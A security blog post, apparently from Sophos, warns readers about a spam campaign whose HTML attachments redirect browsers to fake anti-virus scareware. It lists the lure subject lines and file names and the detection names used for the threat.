Malicious spammers launch major fake anti-virus attack

Filed Under: Spam, Video

SophosLabs's worldwide network of email-monitoring stations has seen a tidalwave of malicious messages being spammed out with an attachment that redirects users' web browsers to a fake anti-virus attack.

The emails have subject names such as:

  • Parking Permit and/or Benefit Card Order Receipt - <random number>
  • You're invited to view my photos!
  • Appointment Confirmation
  • Your Bell e-bill is ready
  • Your Vistaprint Order Is Confirmed
  • Vistaprint Canadian Tax Invoice (<random number>)

By sending emails that pose as credit card charges and free-to-view holiday snaps from Bermuda, it wouldn't be any surprise at all if some users clicked on the attached files (which go by names such as Benefit Card Order Receipt.html, Print this album.html, Appointment Confirmation.html, e-bill.html, Vistaprint Order Invoice.html, and Tax Invoice.html).

Here's a closer look at two of the current spam messages we're seeing:

Parking Permit malicious email

You're invited to view my photos!

Opening the attached HTML file, however, redirects your web browser to a hacked website containing a malicious iFrame (which Sophos detects as Troj/Iframe-FK). This, in turn, loads scripts from other websites that load a fake anti-virus attack that Sophos detects as Mal/FakeAV-EI.

Mal/FakeAV-EI often disguises itself as a bogus version of McAfee VirusScan - regular readers of the blog may remember another attack involving this scareware that I wrote about last month.

Fraser Howard, a principal researcher in SophosLabs, recently made the following YouTube video explaining the problem of fake anti-virus software:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

We also have a white paper which explains the problem of fake anti-virus in greater detail.

So, in this attack, the hackers are using a mixture of human gullibility, poorly protected websites, and the tried-and-trusted trick of scaring users into believing that they have security problems on their PC to con them into downloading more dangerous software or handing over their credit card details.

Sophos is detecting the various HTML files attached to the spam emails as Troj/JSRedir-CH.


You might like

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About the author

Graham Cluley runs his own award-winning computer security blog at, and is a veteran of the anti-virus industry having worked for a number of security companies since the early 1990s. Now an independent security analyst, he regularly makes media appearances and gives computer security presentations. Follow him on Twitter at @gcluley